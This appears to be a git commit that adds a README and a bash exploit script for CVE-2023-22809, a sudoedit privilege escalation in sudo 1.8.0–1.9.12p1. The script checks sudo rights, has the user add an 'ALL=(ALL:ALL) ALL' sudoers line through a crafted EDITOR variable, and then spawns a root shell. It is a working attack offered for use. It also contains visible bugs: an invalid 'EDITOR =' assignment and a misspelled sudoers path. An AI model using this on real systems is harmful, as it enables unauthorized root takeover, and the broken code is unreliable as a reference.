Initial Commit

Initial Commit

README.md

@@ -0,0 +1,13 @@
+# CVE-2023-22809
+
+## sudo Privilege escalation
+
+Affected sudo versions: 1.8.0 to 1.9.12p1 
+
+This script automates the exploitation of the CVE-2023-22809 vulnerability to 
+gain a root shell. 
+
+The script checks if the current user has access to run the `sudoedit` or 
+`sudo -e` command for some file with root privileges. If it does it opens the 
+sudoers file for the attacker to introduce the privilege escalation policy 
+for the current user and get a root shell.

exploit.sh

@@ -0,0 +1,31 @@
+#!/usr/bin/env bash
+#
+# sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
+#
+# Exploit Author: n3m1.sys
+# CVE: CVE-2023-22809
+# Vendor Homepage: https://www.sudo.ws/
+# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
+# Version: 1.8.0 to 1.9.12p1
+# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
+#
+# Running this exploit on a vulnerable system allows a localiattacker to gain 
+# a root shell on the machine.
+#
+# The exploit checks if the current user has privileges to run sudoedit or 
+# sudo -e on a file as root. If so it will open the sudoers file for the
+# attacker to add a line to gain privileges on all the files and get a root 
+# shell.
+
+EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-)
+
+if [ -z "$EXPLOITABLE" ]; then
+    echo "> This user can't run sudoedit as root"
+else
+    echo "> BINGO! User exploitable"
+    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
+    echo "$USER ALL=(ALL:ALL) ALL"
+    read -n 1 -s -r -p "Press any key to continue..."
+    EDITOR = "vim -- /etc/suoders" $EXPLOITABLE
+    sudo su root
+fi